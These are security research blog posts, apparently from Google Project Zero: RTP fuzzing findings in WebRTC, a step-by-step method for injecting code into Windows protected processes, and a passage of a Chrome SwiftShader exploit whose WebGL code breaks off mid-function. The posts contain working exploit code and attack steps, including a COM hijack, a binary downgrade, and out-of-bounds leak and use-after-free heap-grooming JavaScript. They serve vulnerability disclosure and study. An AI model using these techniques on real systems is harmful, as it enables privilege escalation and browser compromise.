Even when it is encrypted, RTP often doesn’t include integrity protection, and if it does, it usually doesn’t discard malformed packets. Instead, it attempts to recover them using strategies such as Forward Error Correction (FEC). Most video conferencing solutions also detect when a channel is noisy or low-bandwidth and attempt to handle the situation in a way that leads to the best audio and video quality, for example, sending fewer frames or changing codecs. Real Time Control Protocol (RTCP) is used to exchange statistics on network quality and coordinate adjusting properties of RTP streams to adapt to network conditions.WebRTC
WebRTC is an open source project that enables video conferencing. It is by far the most commonly used implementation. Chrome, Safari, Firefox, Facebook Messenger, Signal and many other mobile applications use WebRTC. WebRTC seemed like a good starting point for looking at video conferencing as it is heavily used, open source and reasonably well-documented.WebRTC Signalling
I started by looking at WebRTC signalling, because it is an attack surface that does not require any user interaction. Protocols like RTP usually start being processed after a user has picked up the video call, but signalling is performed before the user is notified of the call. WebRTC uses SDP for signalling.
I reviewed the WebRTC SDP parser code, but did not find any bugs. I also compiled it so it would accept an SDP file on the commandline and fuzzed it, but I did not find any bugs through fuzzing either. I later discovered that WebRTC signalling is not implemented consistently across browsers anyhow. Chrome uses the main WebRTC implementation, Safari has branched slightly and Firefox uses their own implementation. Most mobile applications that use WebRTC implement their own signalling in a protocol that is not SDP as well. So it is not likely that a bug in WebRTC signalling would affect a wide variety of targets.
RTP Fuzzing
I then decided to look at how RTP is processed in WebRTC. While RTP is not an interaction-less attack surface because the user usually has to answer the call before RTP traffic is processed, picking up a call is a reasonable action to expect a user to take. I started by looking at the WebRTC source, but it is very large and complex, so I decided fuzzing would be a better approach.
The WebRTC repository contains fuzzers written for OSS-Fuzz for every protocol and codec supported by WebRTC, but they do not simulate the interactions between the various parsers, and do not maintain state between test cases, so it seemed likely that end-to-end fuzzing would provide additional coverage.
Setting up end-to-end fuzzing was fairly time intensive, so to see if it was likely to find many bugs, I altered Chrome to send malformed RTP packets. I changed the srtp_protect function in libsrtp so that it ran the following fuzzer on every packet:
void fuzz(char* buf, int len){
int q = rand()%10;
if (q == 7){ int ind = rand()%len; buf[ind] = rand(); }
if(q == 5){ for(int i = 0; i < len; i++) buf[i] = rand();
}RTP fuzzer (fuzzer q)
When this version was used to make a WebRTC call to an unmodified instance of Chrome, it crashed roughly every 30 seconds.
Most of the crashes were due to divide-by-zero exceptions, which I submitted patches for, but there were three interesting crashes. I reproduced them by altering the WebRTC source in Chrome so that it would generate the packets that caused the same crashes, and then set up a standalone build of WebRTC to reproduce them, so that it was not necessary to rebuild Chrome to reproduce the issues.
The first issue, CVE-2018-6130 is an out-of-bounds memory issue related to the use of std::map find in processing VP9 (a video codec). In the following code, the value t10_pic_idx is pulled out of an RTP packet unverified (GOF stands for group of frames).
if (frame->frame_type() == kVideoFrameKey) {    ...    GofInfo info = gof_info_.find(codec_header.tl0_pic_idx)->second;    FrameReceivedVp9(frame->id.picture_id, &info);    UnwrapPictureIds(frame);    return kHandOff;  }

If this value does not exist in the gof_info_ array, std::map::find returns the end value of the map, which points to one element past the allocated values for the map. Depending on memory layout, dereferencing this iterator will either crash or return the contents of unallocated memory.
The second issue, CVE-2018-6129 is a more typical out-of-bounds read issue, where the index of a field is read out of an RTP packet, and not verified before it is used to index a vector.
The third issue, CVE-2018-6157 is a type confusion issue that occurs when a packet that looks like a VP8 packet is sent to the H264 parser. The packet will eventually be treated like an H264 packet even though it hasn’t gone through the necessary checks for H264. The impact of this issue is also limited to reading out of bounds.
There are a lot of limitations to the approach of fuzzing in a browser. It is very slow, the issues are difficult to reproduce, and it is difficult to fuzz a variety of test cases, because each call needs to be started manually, and certain properties, such as the default codec, can’t change in the middle of the call. After I reported these issues, the WebRTC team suggested that I use the video_replay tool, which can be used to replay RTP streams recorded in a patched browser. The tool was not able to reproduce a lot of my issues because they used non-default WebRTC settings configured through signalling, so I added the ability to load a configuration file alongside the RTP dump to this tool. This made it possible to quickly reproduce vulnerabilities in WebRTC.
This tool also had the benefit of enabling much faster fuzzing, as it was possible to fuzz RTP by fuzzing the RTP dump file and loading it into video_replay. There were some false positives, as it was also possible that fuzzing caused bugs in parsing the RTP dump file format, but most of the bugs were actually in RTP processing.Fuzzing with the video_replay tool with code coverage and ASAN enabled led to four more bugs. We ran the fuzzer on 50 cores for about two weeks to find these issues.
CVE-2018-6156 is probably the most exploitable bug uncovered. It is a large overflow in FEC. The buffer WebRTC uses to process FEC packets is 1500 bytes, but it does no size checking of these packets once they are extracted from RTP. Practically, they can be up to about 2000 bytes long.
CVE-2018-6155 is a use-after-free in a video codec called VP8. It is interesting because it affects the VP8 library, libvpx as opposed to code in WebRTC, so it has the potential to affect software that uses this library other than WebRTC. A generic fix for libvpx was released as a result of this bug.
CVE-2018-16071 is a use-after-free in VP9 processing that is somewhat similar to CVE-2018-6130. Once again, an untrusted index is pulled out of a packet, but this time it is used as the upper bounds of a vector erase operation, so it is possible to delete all the elements of the vector before it is used.
CVE-2018-16083 is an out-of-bounds read in FEC that occurs due to a lack of bounds checking.
Overall, end-to-end fuzzing found a lot of bugs in WebRTC, and a few were fairly serious. They have all now been fixed. This shows that end-to-end fuzzing is an effective approach for finding vulnerabilities in this type of video conferencing solution. In Part 2, we will try a similar approach on FaceTime. Stay tuned!
Categories: Security

Injecting Code into Windows Protected Processes using COM - Part 2

Fri, 11/30/2018 - 13:11
Posted by James Forshaw, Project Zero
In my previous blog I discussed a technique which combined numerous issues I’ve previously reported to Microsoft to inject arbitrary code into a PPL-WindowsTCB process. The techniques presented don’t work for exploiting the older, stronger Protected Processes (PP) for a few different reasons. This blog seeks to remedy this omission and provide details of how I was able to also hijack a full PP-WindowsTCB process without requiring administrator privileges. This is mainly an academic exercise, to see whether I can get code executing in a full PP as there’s not much more you can do inside a PP over a PPL.
As a quick recap of the previous attack, I was able to identify a process which would run as PPL which also exposed a COM service. Specifically, this was the “.NET Runtime Optimization Service” which ships with the .NET framework and uses PPL at CodeGen level to apply cached signing levels to Ahead-of-Time compiled DLLs to allow them to be used with User-Mode Code Integrity (UMCI). By modifying the COM proxy configuration it was possible to induce a type confusion which allowed me to load an arbitrary DLL by hijacking the KnownDlls configuration. Once running code inside the PPL I could abuse a bug in the cached signing feature to create a DLL signed to load into any PPL and through that escalate to PPL-WindowsTCB level.Finding a New TargetMy first thought to exploit full PP would be to use the additional access we were granted from having code running at PPL-WindowsTCB. You might assume you could abuse the cached signed DLL to bypass security checks to load into a full PP. Unfortunately the kernel’s Code Integrity module ignores cached signing levels for full PP. How about KnownDlls in general? If we have administrator privileges and code running in PPL-WindowsTCB we can directly write to the KnownDlls object directory (see another of my blog posts link for why you need to be PPL) and try to get the PP to load an arbitrary DLL. Unfortunately, as I mentioned in the previous blog, this also doesn’t work as full PP ignores KnownDlls. Even if it did load KnownDlls I don’t want to require administrator privileges to inject code into the process.
I decided that it’d make sense to rerun my PowerShell script from the previous blog to discover which executables will run as full PP and at what level. On Windows 10 1803 there’s a significant number of executables which run as PP-Authenticode level, however only four executables would start with a more privileged level as shown in the following table.
PathSigning LevelC:\windows\system32\GenValObj.exeWindowsC:\windows\system32\sppsvc.exeWindowsC:\windows\system32\WerFaultSecure.exeWindowsTCBC:\windows\system32\SgrmBroker.exeWindowsTCB
As I have no known route from PP-Windows level to PP-WindowsTCB level like I had with PPL, only two of the four executables are of interest, WerFaultSecure.exe and SgrmBroker.exe. I correlated these two executables against known COM service registrations, which turned up no results. That doesn’t mean these executables don’t expose a COM attack surface, the .NET executable I abused last time also doesn’t register its COM service, so I also performed some basic reverse engineering looking for COM usage.
The SgrmBroker executable doesn’t do very much at all, it’s a wrapper around an isolated user mode application to implement runtime attestation of the system as part of Windows Defender System Guard and didn’t call into any COM APIs. WerFaultSecure also doesn’t seem to call into COM, however I already knew that WerFaultSecure can load COM objects, as Alex Ionescu used my original COM scriptlet code execution attack to get PPL-WindowsTCB level though hijacking a COM object load in WerFaultSecure. Even though WerFaultSecure didn’t expose a service if it could initialize COM perhaps there was something that I could abuse to get arbitrary code execution? To understand the attack surface of COM we need to understand how COM implements out-of-process COM servers and COM remoting in general.Digging into COM Remoting InternalsCommunication between a COM client and a COM server is over the MSRPC protocol, which is based on the Open Group’s DCE/RPC protocol. For local communication the transport used is Advanced Local Procedure Call (ALPC) ports. At a high level communication occurs between a client and server based on the following diagram:

In order for a client to find the location of a server the process registers an ALPC endpoint with the DCOM activator in RPCSS ①. This endpoint is registered alongside the Object Exporter ID (OXID) of the server, which is a 64 bit randomly generated number assigned by RPCSS. When a client wants to connect to a server it must first ask RPCSS to resolve the server’s OXID value to an RPC endpoint ②. With the knowledge of the ALPC RPC endpoint the client can connect to the server and call methods on the COM object ③.
The OXID value is discovered either from an out-of-process (OOP) COM activation result or via a marshaled Object Reference (OBJREF) structure. Under the hood the client calls the ResolveOxid method on RPCSS’s IObjectExporter RPC interface. The prototype of ResolveOxid is as follows:
interface IObjectExporter {   // ...   error_status_t ResolveOxid(     [in] handle_t hRpc,     [in] OXID* pOxid,     [in] unsigned short cRequestedProtseqs,     [in] unsigned short arRequestedProtseqs[],     [out, ref] DUALSTRINGARRAY** ppdsaOxidBindings,     [out, ref] IPID* pipidRemUnknown,     [out, ref] DWORD* pAuthnHint );
In the prototype we can see the OXID to resolve is being passed in the pOxid parameter and the server returns an array of Dual String Bindings which represent RPC endpoints to connect to for this OXID value. The server also returns two other pieces of information, an Authentication Level Hint (pAuthnHint) which we can safely ignore and the IPID of the IRemUnknown interface (pipidRemUnknown) which we can’t.
An IPID is a GUID value called the Interface Process ID. This represents the unique identifier for a COM interface inside the server, and it’s needed to communicate with the correct COM object as it allows the single RPC endpoint to multiplex multiple interfaces over one connection. The IRemUnknown interface is a default COM interface every COM server must implement as it’s used to query for new IPIDs on an existing object (using RemQueryInterface) and maintain the remote object’s reference count (through RemAddRef and RemRelease methods). As this interface must always exist regardless of whether an actual COM server is exported and the IPID can be discovered through resolving the server’s OXID, I wondered what other methods the interface supported in case there was anything I could leverage to get code execution.
The COM runtime code maintains a database of all IPIDs as it needs to lookup the server object when it receives a request for calling a method. If we know the structure of this database we could discover where the IRemUnknown interface is implemented, parse its methods and find out what other features it supports. Fortunately I’ve done the work of reverse engineering the database format in my OleViewDotNet tool, specifically the command Get-ComProcess in the PowerShell module. If we run the command against a process which uses COM, but doesn’t actually implement a COM server (such as notepad) we can try and identify the correct IPID.

In this example screenshot there’s actually two IPIDs exported, IRundown and a Windows.Foundation interface. The Windows.Foundation interface we can safely ignore, but IRundown looks more interesting. In fact if you perform the same check on any COM process you’ll discover they also have IRundown interfaces exported. Are we not expecting an IRemUnknown interface though? If we pass the ResolveMethodNames and ParseStubMethods parameters to Get-ComProcess, the command will try and parse method parameters for the interface and lookup names based on public symbols. With the parsed interface data we can pass the IPID object to the Format-ComProxy command to get a basic text representation of the IRundown interface. After cleanup the IRundown interface looks like the following:
[uuid("00000134-0000-0000-c000-000000000046")]interface IRundown : IUnknown {    HRESULT RemQueryInterface(...);    HRESULT RemAddRef(...);    HRESULT RemRelease(...);    HRESULT RemQueryInterface2(...);    HRESULT RemChangeRef(...);    HRESULT DoCallback([in] struct XAptCallback* pCallbackData);    HRESULT DoNonreentrantCallback([in] struct XAptCallback* pCallbackData);    HRESULT AcknowledgeMarshalingSets(...);    HRESULT GetInterfaceNameFromIPID(...);    HRESULT RundownOid(...);}
This interface is a superset of IRemUnknown, it implements the methods such as RemQueryInterface and then adds some more additional methods for good measure. What really interested me was the DoCallback and DoNonreentrantCallback methods, they sound like they might execute a “callback” of some sort. Perhaps we can abuse these methods? Let’s look at the implementation of DoCallback based on a bit of RE (DoNonreentrantCallback just delegates to DoCallback internally so we don’t need to treat it specially):
struct XAptCallback {  void* pfnCallback;  void* pParam;  void* pServerCtx;  void* pUnk;  void* iid;  int   iMethod;  GUID  guidProcessSecret;};
HRESULT CRemoteUnknown::DoCallback(XAptCallback *pCallbackData) {  CProcessSecret::GetProcessSecret(&pguidProcessSecret);  if (!memcmp(&pguidProcessSecret,              &pCallbackData->guidProcessSecret, sizeof(GUID))) {    if (pCallbackData->pServerCtx == GetCurrentContext()) {      return pCallbackData->pfnCallback(pCallbackData->pParam);    } else {      return SwitchForCallback(                   pCallbackData->pServerCtx,                   pCallbackData->pfnCallback,                   pCallbackData->pParam);    }  }  return E_INVALIDARG;}
This method is very interesting, it takes a structure containing a pointer to a method to call and an arbitrary parameter and executes the pointer. The only restrictions on calling the arbitrary method is you must know ahead of time a randomly generated GUID value, the process secret, and the address of a server context. The checking of a per-process random value is a common security pattern in COM APIs and is typically used to restrict functionality to only in-process callers. I abused something similar in the Free-Threaded Marshaler way back in 2014.
What is the purpose of DoCallback? The COM runtime creates a new IRundown interface for every COM apartment that’s initialized. This is actually important as calling methods between apartments, say calling a STA object from a MTA, you need to call the appropriate IRemUnknown methods in the correct apartment. Therefore while the developers were there they added a few more methods which would be useful for calling between apartments, including a general “call anything you like” method. This is used by the internals of the COM runtime and is exposed indirectly through methods such as CoCreateObjectInContext. To prevent the DoCallback method being abused OOP the per-process secret is checked which should limit it to only in-process callers, unless an external process can read the secret from memory.Abusing DoCallbackWe have a primitive to execute arbitrary code within any process which has initialized COM by invoking the DoCallback method, which should include a PP. In order to successfully call arbitrary code we need to know four pieces of information:
  1. The ALPC port that the COM process is listening on.
  2. The IPID of the IRundown interface.
  3. The initialized process secret value.
  4. The address of a valid context, ideally the same value that GetCurrentContext returns to call on the same RPC thread.

Getting the ALPC port and the IPID is easy, if the process exposes a COM server, as both will be provided during OXID resolving. Unfortunately WerFaultSecure doesn’t expose a COM object we can create so that angle wouldn’t be open to us, leaving us with a problem we need to solve. Extracting the process secret and context value requires reading the contents of process memory. This is another problem, one of the intentional security features of PP is preventing a non-PP process from reading memory from a PP process. How are we going to solve these two problems?
Talking this through with Alex at Recon we came up with a possible attack if you have administrator access. Even being an administrator doesn’t allow you to read memory directly from a PP process. We could have loaded a driver, but that would break PP entirely, so we considered how to do it without needing kernel code execution.
First and easiest, the ALPC port and IPID can be extracted from RPCSS. The RPCSS service does not run protected (even PPL) so this is possible to do without any clever tricks other than knowing where the values are stored in memory. For the context pointer, we should be able to brute force the location as there’s likely to be only a narrow range of memory locations to test, made slightly easier if we use the 32 bit version of WerFaultSecure.
Extracting the secret is somewhat harder. The secret is initialized in writable memory and therefore ends up in the process’ working set once it’s modified. As the page isn’t locked it will be eligible for paging if the memory conditions are right. Therefore if we could force the page containing the secret to be paged to disk we could read it even though it came from a PP process. As an administrator, we can perform the following to steal the secret:
  1. Ensure the secret is initialized and the page is modified.
  2. Force the process to trim its working set, this should ensure the modified page containing the secret ends up paged to disk (eventually).
  3. Create a kernel memory crash dump file using the NtSystemDebugControl system call. The crash dump can be created by an administrator without kernel debugging being enabled and will contain all live memory in the kernel. Note this doesn’t actually crash the system.
  4. Parse the crash dump for the Page Table Entry of the page containing the secret value. The PTE should disclose where in the paging file on disk the paged data is located.
  5. Open the volume containing the paging file for read access, parse the NTFS structures to find the paging file and then find the paged data and extract the secret.

After coming up with this attack it seemed far too much like hard work and needed administrator privileges which I wanted to avoid. I needed to come up with an alternative solution.Using WerFaultSecure for its Original PurposeUp to this point I’ve been discussing WerFaultSecure as a process that can be abused to get arbitrary code running inside a PP/PPL. I’ve not really described why the process can run at the maximum PP/PPL levels. WerFaultSecure is used by the Windows Error Reporting service to create crash dumps from protected processes. Therefore it needs to run at elevated PP levels to ensure it can dump any possible user-mode PP. Why can we not just get WerFaultSecure to create a crash dump of itself, which would leak the contents of process memory and allow us to extract any information we require?
The reason we can’t use WerFaultSecure is it encrypts the contents of the crash dump before writing it to disk. The encryption is done in a way to only allow Microsoft to decrypt the crash dump, using asymmetric encryption to protect a random session key which can be provided to the Microsoft WER web service. Outside of a weakness in Microsoft’s implementation or a new cryptographic attack against the primitives being used getting the encrypted data seems like a non-starter.
However, it wasn’t always this way. In 2014 Alex presented at NoSuchCon about PPL and discussed a bug he’d discovered in how WerFaultSecure created encrypted dump files. It used a two step process, first it wrote out the crash dump unencrypted, then it encrypted the crash dump. Perhaps you can spot the flaw? It was possible to steal the unencrypted crash dump. Due to the way WerFaultSecure was called it accepted two file handles, one for the unencrypted dump and one for the encrypted dump. By calling WerFaultSecure directly the unencrypted dump would never be deleted which means that you don’t even need to race the encryption process.
There’s one problem with this, it was fixed in 2015 in MS15-006. After that fix WerFaultSecure encrypted the crash dump directly, it never ends up on disk unencrypted at any point. But that got me thinking, while they might have fixed the bug going forward what prevents us from taking the old vulnerable version of WerFaultSecure from Windows 8.1 and executing it on Windows 10? I downloaded the ISO for Windows 8.1 from Microsoft’s website (link), extracted the binary and tested it, with predictable results:

We can take the vulnerable version of WerFaultSecure from Windows 8.1 and it will run quite happily on Windows 10 at PP-WindowsTCB level. Why? It’s unclear, but due to the way PP is secured all the trust is based on the signed executable. As the signature of the executable is still valid the OS just trusts it can be run at the requested protection level. Presumably there must be some way that Microsoft can block specific executables, although at least they can’t just revoke their own signing certificates. Perhaps OS binaries should have an EKU in the certificate which indicates what version they’re designed to run on? After all Microsoft already added a new EKU when moving from Windows 8 to 8.1 to block downgrade attacks to bypass WinRT UMCI signing so generalizing might make some sense, especially for certain PP levels.
After a little bit of RE and reference to Alex’s presentation I was able to work out the various parameters I needed to be passed to the WerFaultSecure process to perform a dump of a PP:
ParameterDescription/hEnable secure dump mode./pid {pid}Specify the Process ID to dump./tid {tid}Specify the Thread ID in the process to dump./file {handle}Specify a handle to a writable file for the unencrypted crash dump/encfile {handle}Specify a handle to a writable file for the encrypted crash dump/cancel {handle}Specify a handle to an event to indicate the dump should be cancelled/type {flags}Specify MIMDUMPTYPE flags for call to MiniDumpWriteDump
This gives us everything we need to complete the exploit. We don’t need administrator privileges to start the old version of WerFaultSecure as PP-WindowsTCB. We can get it to dump another copy of WerFaultSecure with COM initialized and use the crash dump to extract all the information we need including the ALPC Port and IPID needed to communicate. We don’t need to write our own crash dump parser as the Debug Engine API which comes installed with Windows can be used. Once we’ve extracted all the information we need we can call DoCallback and invoke arbitrary code.Putting it All TogetherThere’s still two things we need to complete the exploit, how to get WerFaultSecure to start up COM and what we can call to get completely arbitrary code running inside the PP-WindowsTCB process.
Let’s tackle the first part, how to get COM started. As I mentioned earlier, WerFaultSecure doesn’t directly call any COM methods, but Alex had clearly used it before so to save time I just asked him. The trick was to get WerFaultSecure to dump an AppContainer process, this results in a call to the method CCrashReport::ExemptFromPlmHandling inside the FaultRep DLL resulting in the loading of CLSID {07FC2B94-5285-417E-8AC3-C2CE5240B0FA}, which resolves to an undocumented COM object. All that matters is this allows WerFaultSecure to initialize COM.
Unfortunately I’ve not been entirely truthful during my description of how COM remoting is setup. Just loading a COM object is not always sufficient to initialize the IRundown interface or the RPC endpoint. This makes sense, if all COM calls are to code within the same apartment then why bother to initialize the entire remoting code for COM. In this case even though we can make WerFaultSecure load a COM object it doesn’t meet the conditions to setup remoting. What can we do to convince the COM runtime that we’d really like it to initialize? One possibility is to change the COM registration from an in-process class to an OOP class. As shown in the screenshot below the COM registration is being queried first from HKEY_CURRENT_USER which means we can hijack it without needing administrator privileges.

Unfortunately looking at the code this won’t work, a cut down version is shown below:
HRESULT CCrashReport::ExemptFromPlmHandling(DWORD dwProcessId) {  CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);  IOSTaskCompletion* inf;  HRESULT hr = CoCreateInstance(CLSID_OSTaskCompletion,      NULL, CLSCTX_INPROC_SERVER, IID_PPV_ARGS(&inf));  if (SUCCEEDED(hr)) {    // Open process and disable PLM handling.  }}
The code passes the flag, CLSCTX_INPROC_SERVER to CoCreateInstance. This flag limits the lookup code in the COM runtime to only look for in-process class registrations. Even if we replace the registration with one for an OOP class the COM runtime would just ignore it. Fortunately there’s another way, the code is initializing the current thread’s COM apartment as a STA using the COINIT_APARTMENTTHREADED flag with CoInitializeEx. Looking at the registration of the COM object its threading model is set to “Both”. What this means in practice is the object supports being called directly from either a STA or a MTA.
However, if the threading model was instead set to “Free” then the object only supports direct calls from an MTA, which means the COM runtime will have to enable remoting, create the object in an MTA (using something similar to DoCallback) then marshal calls to that object from the original apartment. Once COM starts remoting it initializes all remote features including IRundown. As we can hijack the server registration we can just change the threading model, this will cause WerFaultSecure to start COM remoting which we can now exploit.
What about the second part, what can we call inside the process to execute arbitrary code? Anything we call using DoCallback must meet the following criteria, to avoid undefined behavior:
  1. Only takes one pointer sized parameter.
  2. Only the lower 32 bits of the call are returned as the HRESULT if we need it.
  3. The callsite is guarded by CFG so it must be something which is a valid indirect call target.

As WerFaultSecure isn’t doing anything special then at a minimum any DLL exported function should be a valid indirect call target. LoadLibrary clearly meets our criteria as it takes a single parameter which is a pointer to the DLL path and we don’t really care about the return value so the truncation isn’t important. We can’t just load any DLL as it must be correctly signed, but what about hijacking KnownDlls?
Wait, didn’t I say that PP can’t load from KnownDlls? Yes they can’t but only because the value of the LdrpKnownDllDirectoryHandle global variable is always set to NULL during process initialization. When the DLL loader checks for the presence of a known DLL if the handle is NULL the check returns immediately. However if the handle has a value it will do the normal check and just like in PPL no additional security checks are performed if the process maps an image from an existing section object. Therefore if we can modify the LdrpKnownDllDirectoryHandle global variable to point to a directory object inherited into the PP we can get it to load an arbitrary DLL.
The final piece of the puzzle is finding an exported function which we can call to write an arbitrary value into the global variable. This turns out to be harder than expected. The ideal function would be one which takes a single pointer value argument and writes to that location with no other side effects. After a number of false starts (including trying to use gets) I settled on the pair, SetProcessDefaultLayout and GetProcessDefaultLayout in USER32. The set function takes a single value which is a set of flags and stores it in a global location (actually in the kernel, but good enough). The get method will then write that value to an arbitrary pointer. This isn’t perfect as the values we can set and therefore write are limited to the numbers 0-7, however by offsetting the pointer in the get calls we can write a value of the form 0x0?0?0?0? where the ? can be any value between 0 and 7. As the value just has to refer to the handle inside a process under our control we can easily craft the handle to meet these strict requirements. Wrapping UpIn conclusion to get arbitrary code execution inside a PP-WindowsTCB without administrator privileges process we can do the following:
  1. Create a fake KnownDlls directory, duplicating the handle until it meets a pattern suitable for writing through Get/SetProcessDefaultLayout. Mark the handle as inheritable.
  2. Create the COM object hijack for CLSID {07FC2B94-5285-417E-8AC3-C2CE5240B0FA} with the ThreadingModel set to “Free”.
  3. Start Windows 10 WerFaultSecure at PP-WindowsTCB level and request a crash dump from an AppContainer process. During process creation the fake KnownDlls must be added to ensure it’s inherited into the new process.
  4. Wait until COM has initialized then use Windows 8.1 WerFaultSecure to dump the process memory of the target.
  5. Parse the crash dump to discover the process secret, context pointer and IPID for IRundown.
  6. Connect to the IRundown interface and use DoCallback with Get/SetProcessDefaultLayout to modify the LdrpKnownDllDirectoryHandle global variable to the handle value created in 1.
  7. Call DoCallback again to call LoadLibrary with a name to load from our fake KnownDlls.

This process works on all supported versions of Windows 10 including 1809. It’s worth noting that invoking DoCallback can be used with any process where you can read the contents of memory and the process has initialized COM remoting. For example, if you had an arbitrary memory disclosure vulnerability in a privileged COM service you could use this attack to convert the arbitrary read into arbitrary execute. As I don’t tend to look for memory corruption/memory disclosure vulnerabilities perhaps this behavior is of more use to others.
That concludes my series of attacking Windows protected processes. I think it demonstrates that preventing a user from attacking processes which share resources, such as registry and files is ultimately doomed to fail. This is probably why Microsoft do not support PP/PPL as a security boundary. Isolated User Mode seems a much stronger primitive, although that does come with additional resource requirements which PP/PPL doesn’t for the most part.  I wouldn’t be surprised if newer versions of Windows 10, by which I mean after version 1809, will try to mitigate these attacks in some way, but you’ll almost certainly be able to find a bypass.
Categories: Security

Heap Feng Shader: Exploiting SwiftShader in Chrome

Wed, 10/24/2018 - 14:17
Posted by Mark Brand, Google Project Zero
On the majority of systems, under normal conditions, SwiftShader will never be used by Chrome - it’s used as a fallback if you have a known-bad “blacklisted” graphics card or driver. However, Chrome can also decide at runtime that your graphics driver is having issues, and switch to using SwiftShader to give a better user experience. If you’re interested to see the performance difference, or just to have a play, you can launch Chrome using SwiftShader instead of GPU acceleration using the --disable-gpu command line flag.
SwiftShader is quite an interesting attack surface in Chrome, since all of the rendering work is done in a separate process; the GPU process. Since this process is responsible for drawing to the screen, it needs to have more privileges than the highly-sandboxed renderer processes that are usually handling webpage content. On typical Linux desktop system configurations, technical limitations in sandboxing access to the X11 server mean that this sandbox is very weak; on other platforms such as Windows, the GPU process still has access to a significantly larger kernel attack surface. Can we write an exploit that gets code execution in the GPU process without first compromising a renderer? We’ll look at exploiting two issues that we reported that were recently fixed by Chrome.
It turns out that if you have a supported GPU, it’s still relatively straightforward for an attacker to force your browser to use SwiftShader for accelerated graphics - if the GPU process crashes more than 4 times, Chrome will fallback to this software rendering path instead of disabling acceleration. In my testing it’s quite simple to cause the GPU process to crash or hit an out-of-memory condition from WebGL - this is left as an exercise for the interested reader. For the rest of this blog-post we’ll be assuming that the GPU process is already in the fallback software rendering mode.
Previous precision problems
So; we previously discussed an information leak issue resulting from some precision issues in the SwiftShader code - so we’ll start here, with a useful leaking primitive from this issue. A little bit of playing around brought me to the following result, which will allocate a texture of size 0xb620000 in the GPU process, and when the function read()is called on it will return the 0x10000 bytes directly following that buffer back to javascript. (The allocation will happen at the first line marked in bold, and the out-of-bounds access happens at the second).
function issue_1584(gl) {  const src_width  = 0x2000;  const src_height = 0x16c4;
 // we use a texture for the source, since this will be allocated directly  // when we call glTexImage2D.
 this.src_fb = gl.createFramebuffer();  gl.bindFramebuffer(gl.READ_FRAMEBUFFER, this.src_fb);
 let src_data = new Uint8Array(src_width * src_height * 4);  for (var i = 0; i < src_data.length; ++i) {    src_data[i] = 0x41;  }
 let src_tex = gl.createTexture();  gl.bindTexture(gl.TEXTURE_2D, src_tex);  gl.texImage2D(gl.TEXTURE_2D, 0, gl.RGBA8, src_width, src_height, 0, gl.RGBA, gl.UNSIGNED_BYTE, src_data);  gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MIN_FILTER, gl.NEAREST);  gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MAG_FILTER, gl.NEAREST);  gl.framebufferTexture2D(gl.READ_FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.TEXTURE_2D, src_tex, 0);
 this.read = function() {    gl.bindFramebuffer(gl.READ_FRAMEBUFFER, this.src_fb);
   const dst_width  = 0x2000;    const dst_height = 0x1fc4;
   dst_fb = gl.createFramebuffer();    gl.bindFramebuffer(gl.DRAW_FRAMEBUFFER, dst_fb);
   let dst_rb = gl.createRenderbuffer();    gl.bindRenderbuffer(gl.RENDERBUFFER, dst_rb);    gl.renderbufferStorage(gl.RENDERBUFFER, gl.RGBA8, dst_width, dst_height);    gl.framebufferRenderbuffer(gl.DRAW_FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.RENDERBUFFER, dst_rb);
   gl.bindFramebuffer(gl.DRAW_FRAMEBUFFER, dst_fb);
   // trigger    gl.blitFramebuffer(0, 0, src_width, src_height,                       0, 0, dst_width, dst_height,                       gl.COLOR_BUFFER_BIT, gl.NEAREST);
   // copy the out of bounds data back to javascript    var leak_data = new Uint8Array(dst_width * 8);    gl.bindFramebuffer(gl.READ_FRAMEBUFFER, dst_fb);    gl.readPixels(0, dst_height - 1, dst_width, 1, gl.RGBA, gl.UNSIGNED_BYTE, leak_data);    return leak_data.buffer;  }
 return this;}
This might seem like quite a crude leak primitive, but since SwiftShader is using the system heap, it’s quite easy to arrange for the memory directly following this allocation to be accessible safely.
And a second bug
Now, the next vulnerability we have is a use-after-free of an egl::ImageImplementation object caused by a reference count overflow. This object is quite a nice object from an exploitation perspective, since from javascript we can read and write from the data it stores, so it seems like the nicest exploitation approach would be to replace this object with a corrupted version; however, as it’s a c++ object we’ll need to break ASLR in the GPU process to achieve this. If you’re reading along in the exploit code, the function leak_image in feng_shader.html implements a crude spray of egl::ImageImplementation objects and uses the information leak above to find an object to copy.
So - a stock-take. We’ve just free’d an object, and we know exactly what the data that *should* be in that object looks like. This seems straightforward - now we just need to find a primitive that will allow us to replace it!
This was actually the most frustrating part of the exploit. Due to the multiple levels of validation/duplication/copying that occur when OpenGL commands are passed from WebGL to the GPU process (Initial WebGL validation (in renderer), GPU command buffer interface, ANGLE validation), getting a single allocation of a controlled size with controlled data is non-trivial! The majority of allocations that you’d expect to be useful (image/texture data etc.) end up having lots of size restrictions or being rounded to different sizes.
However, there is one nice primitive for doing this - shader uniforms. This is the way in which parameters are passed to programmable GPU shaders; and if we look in the SwiftShader code we can see that (eventually) when these are allocated they will do a direct call to operator new[]. We can read and write from the data stored in a uniform, so this will give us the primitive that we need.
The code below implements this technique for (very basic) heap grooming in the SwiftShader/GPU process, and an optimised method for overflowing the reference count. The shader source code (the first bold section) will cause 4 allocations of size 0xf0 when the program object is linked, and the second bold section is where the original object will be free’d and replaced by a shader uniform object.
function issue_1585(gl, fake) {  let vertex_shader = gl.createShader(gl.VERTEX_SHADER);  gl.shaderSource(vertex_shader, `    attribute vec4 position;    uniform int block0[60];    uniform int block1[60];    uniform int block2[60];    uniform int block3[60];
   void main() {      gl_Position = position;      gl_Position.x += float(block0[0]);      gl_Position.x += float(block1[0]);      gl_Position.x += float(block2[0]);      gl_Position.x += float(block3[0]);    }`);  gl.compileShader(vertex_shader);
 let fragment_shader = gl.createShader(gl.FRAGMENT_SHADER);  gl.shaderSource(fragment_shader, `    void main() {      gl_FragColor = vec4(0.0, 0.0, 0.0, 0.0);    }`);  gl.compileShader(fragment_shader);
 this.program = gl.createProgram();  gl.attachShader(this.program, vertex_shader);  gl.attachShader(this.program, fragment_shader);
 const uaf_width = 8190;  const uaf_height = 8190;
 this.fb = gl.createFramebuffer();  uaf_rb = gl.createRenderbuffer();
